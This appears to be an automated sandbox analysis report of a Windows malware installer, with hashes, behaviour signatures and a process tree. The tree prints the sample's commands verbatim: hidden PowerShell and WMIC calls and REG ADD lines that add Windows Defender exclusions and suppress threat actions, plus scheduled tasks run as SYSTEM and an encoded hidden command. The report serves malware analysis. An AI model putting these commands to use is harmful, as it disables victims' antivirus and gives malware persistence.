Analysis
-
max time kernel
203s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
01-07-2024 05:07
General
-
Target
bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe
-
Size
7.3MB
-
MD5
e6cd825e0b1461cc3c862bfd1b8eaa0e
-
SHA1
b3ff8e853ab4ed8f83478fc96c05469884055a95
-
SHA256
bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db
-
SHA512
b51f65bf6d2500d0c67fecd9bf6db6d15953ffda47c94f98cd829102eb45120af2621cfcc415edf2a5410ab8f63462e8ce83f2982d86fc3d54df3cc114791ca4
-
SSDEEP
196608:91OT31uC6wpe4pxkL9u3BmK+lPVFPyPvrffsoRYjViMm6aP+:3OLf3xF3Bmjl94vrfkoGjEbP+
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 33 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 49 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe"C:\Users\Admin\AppData\Local\Temp\bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS61D7.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS638C.tmp\Install.exe.\Install.exe /qwdidsn "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS638C.tmp\Install.exe\" q7 /ITCdidPr 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 8284⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS638C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS638C.tmp\Install.exe q7 /ITCdidPr 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MIUMVdEgyTUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MIUMVdEgyTUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NNMAoTKMcAkAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NNMAoTKMcAkAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBBSFQQZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBBSFQQZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rPikKiIbwrQGukIChiR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rPikKiIbwrQGukIChiR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rUfZlqUIdWiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rUfZlqUIdWiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fHdtCMTPryqSDgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fHdtCMTPryqSDgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fHdtCMTPryqSDgVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fHdtCMTPryqSDgVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WZpWNMsDzSAcKsSA /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WZpWNMsDzSAcKsSA /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmGXRvrEt" /SC once /ST 02:56:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmGXRvrEt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmGXRvrEt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MhsnVFKWmmyXGZkTD" /SC once /ST 03:30:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\EeoKfwv.exe\" DG /DREddidYl 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MhsnVFKWmmyXGZkTD"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 7762⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\EeoKfwv.exeC:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\EeoKfwv.exe DG /DREddidYl 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUVDAOPnPkUhchiViu"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
